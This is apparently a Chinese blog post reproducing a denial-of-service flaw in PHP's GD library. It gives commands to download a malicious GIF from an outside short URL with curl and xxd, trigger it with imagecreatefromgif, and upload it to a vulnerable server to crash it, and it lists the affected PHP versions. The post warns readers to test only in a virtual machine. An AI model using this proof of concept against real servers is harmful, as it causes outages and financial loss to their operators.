一、检测我的虚拟机是否装有php-gd库
1、运行命令:php -m | grep -i gd
2、如果上图中没有出现gd,我们就需要装一下了。运行命令apt-get install php-gd。
二、生成恶意的gif文件
1、curl -L https://git.io/vN0n4 | xxd -r > poc.gif
2、运行top命令看下我的CPU使用率
3、测试恶意代码:
php -r ‘imagecreatefromgif(“poc.gif”);’
CPU瞬间上升到了百分百,我想再运行一下top命令来个CPU对比图都做不到了,不得不重启我的KALI。
这个漏洞的影响版本范围如下:
PHP 5 < 5.6.33
PHP 7.0 < 7.0.27
PHP 7.1 < 7.1.13
PHP 7.2 < 7.2.1
如果服务器支持php-gd库的话,上传生成的poc.gif,服务器就宕掉了。最后我要郑重说下,这个漏洞肯定有的服务器还没有补,如果你去搞恶作剧的话,会给对方造成经济损失的,会违反国家安全法律,所以一定要在虚拟机里测试,明白这个漏洞的原理就行。
说说梦想,谈谈感悟 ,聊聊技术,有啥要说的来github留言吧 https://github.com/cjx2328
- 随机文章
标签云集
-
前端开发
PHP小技巧
docker
linux
logo
docker小技巧
android
JavaScript小技巧
electron开发
APP设计参考
Java
分布式
APP UI设计
mysql
移动端识别
设计灵感
css
大数据可视化
docker命令
javascript
前端技术
react
交互设计
jupyter
docker的使用
swoole
nginx
网页设计
app设计
页面设计
vue小技巧
adobe
iphone x
python插件
webpack
数据库
vue
golang小技巧
Redis
设计教程
树莓派
mysql优化
php
ios
图标设计
python
ui设计
MySQL小知识
zabbix
k8s
